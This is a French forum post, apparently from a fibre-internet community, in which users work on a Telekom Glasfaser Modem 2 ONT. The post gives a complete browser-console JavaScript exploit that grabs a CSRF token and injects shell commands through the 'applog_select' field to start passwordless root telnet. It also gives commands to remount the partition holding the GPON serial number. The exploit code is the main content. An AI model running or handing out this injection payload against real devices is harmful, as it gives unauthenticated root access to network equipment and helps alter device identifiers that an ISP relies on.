Bonsoir, oui je l'ai toujours, cela me permettra de voir si la TV fonctionne avec cet ONT.
Toutefois, j'ai uniquement lu en diagonale, quelles sont les commandes curl à lancer pour avoir accès à un shell ?
Alors si je remets la séquence:
une fois que tu as accès à l'ONT en 192.168.100.1, si tu past le code suivant dans la console JS et que ca répond '1' tu devrais avoir un telnet sans mot de passe activé
// Fetch a non csrf protected page to get a csrf token
await fetch("http://192.168.100.1/setup.cgi?next_file=statusandsupport/status.html").then(function (response) {
return response.text();
}).then(function (html) {
//inject the html response into a HTML DOM to parse it
var el = document.createElement( 'html' );
el.innerHTML = html;
//The token is inserted into the first <script> tag of the page
var es = el.getElementsByTagName( 'script' );
var aText = es[0].text;
//Add the csrf token in the document for other requests
document.csrf_token = aText.match("'(.*)'")[1];
}).catch(function (err) {
console.warn('Something went wrong.', err);
});
//use the csrf token to activate telnet with no login and a shell
fetch('http://192.168.100.1/data/statussupporteventlog_applog_download.json?_=1686211215966&csrf_token='+document.csrf_token, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'
},
body: 'applog_select=a;echo "#!/bin/sh" > /tmp/slogin;echo "export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/mnt/rootfs/bin" >> /tmp/slogin;echo "/bin/sh" >> /tmp/slogin;/bin/chmod 755 /tmp/slogin;/usr/sbin/telnetd -l /tmp/slogin'
})
.then(res => res.json())
.then(console.log)
du coup telnet 192.168.100.1 devrait ouvrir un shell sans mot de passe en root
//EDIT avant d'attaquer la remount de cette partition @hwti propose d'essayer directement le fichier /tmp/hw_info/gpon_sn cf
https://lafibre.info/remplacer-bbox/test-glasfaser-modem-2-telekom-pour-remplacement-ont-2-5gbe-synchro-ok-ipv4-ok/msg1020441/#msg1020441)
Ensuite dans le shell tu peux remonter la partition avec les S/N en RW:
mount -o remount,rw /dev/mtdblock5 /tmp/var_link_dir/ft
je serais d'avis de faire un backup des fichiers du dossier ft au cas ou ...
Dans tous les cas il faut applisquer le PLOAM password (cf methode curl déjà posté dans le thread)
Par contre a chaque reboot faut refaire la manip pour le telnet, le S/N faudra voir quel fichier fonctionne, le PLOAM est sauvé par contre. Tant qu'on a un telnet non secure il ne vaut mieux pas le garder après reboot.
EDIT le fichier a modifier est gpon_sn
Benoit
Voilà.